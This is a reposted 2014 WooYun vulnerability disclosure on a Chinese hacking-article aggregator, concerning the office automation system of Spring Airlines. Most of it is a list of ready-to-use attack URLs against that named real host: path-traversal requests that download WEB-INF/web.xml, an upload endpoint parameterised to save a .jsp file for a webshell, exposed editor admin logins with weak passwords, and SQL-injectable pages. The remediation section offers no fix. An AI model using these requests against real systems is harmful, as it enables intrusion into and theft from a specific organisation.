记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

春秋航空重要系统多处高危漏洞可getshell

2014-08-07 06:05

1、任意文件下载



http://oa.china-sss.com/defaultroot/download_old.jsp?path=..&name=x&FileName=WEB-INF/web.xml

http://oa.china-sss.com/defaultroot/netdisk/download_netdisk.jsp?path=1&fileName=../../WEB-INF/web&fileExtName=xml&fileSaveName=x

http://oa.china-sss.com/defaultroot/information_manager/informationmanager_download.jsp?path=..&FileName=WEB-INF/web.xml&name=x

http://oa.china-sss.com/defaultroot/download_netdisk.jsp?path=1&fileName=../../WEB-INF/web&fileExtName=xml&fileSaveName=x

http://oa.china-sss.com/defaultroot/wage_manager/download_wage_excelMode.jsp?fileRealName=x&fileSaveName=../../WEB-INF/web.xml



2、任意文件上传

http://oa.china-sss.com/defaultroot/dossier/dossier_import.jsp

http://oa.china-sss.com/defaultroot/govezoffice/custom_documentmanager/smartUpload.jsp?path=..&mode=add&fileName=hello.jsp&saveName=hello.jsp&tableName=hello.jsp&fileMaxSize=0&fileMaxNum=null&fileType=jsp&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0



3、编辑器弱口令

http://oa.china-sss.com/defaultroot/public/edit/admin/login.jsp

http://oa.china-sss.com/defaultroot/public/edit2/admin/login.jsp (建议删除后台)



4、sql注入

http://oa.china-sss.com/defaultroot/outMailLoginCheck.jsp?userAccount=&outMailRandom=

http://oa.china-sss.com/efaultroot/iWebRevision.jsp/DocumentEdit.jsp(此文件多处存在)

漏洞证明:

oa延时盲注.jpg

oa-shell.jpg

oa.jpg

oa (2).jpg

editor.jpg

oa.jpg

修复方案:

好多呀。。。。。


知识来源: www.wooyun.org/bugs/wooyun-2014-065877

阅读:212808 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“春秋航空重要系统多处高危漏洞可getshell”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

广而告之 💖

标签云 ☁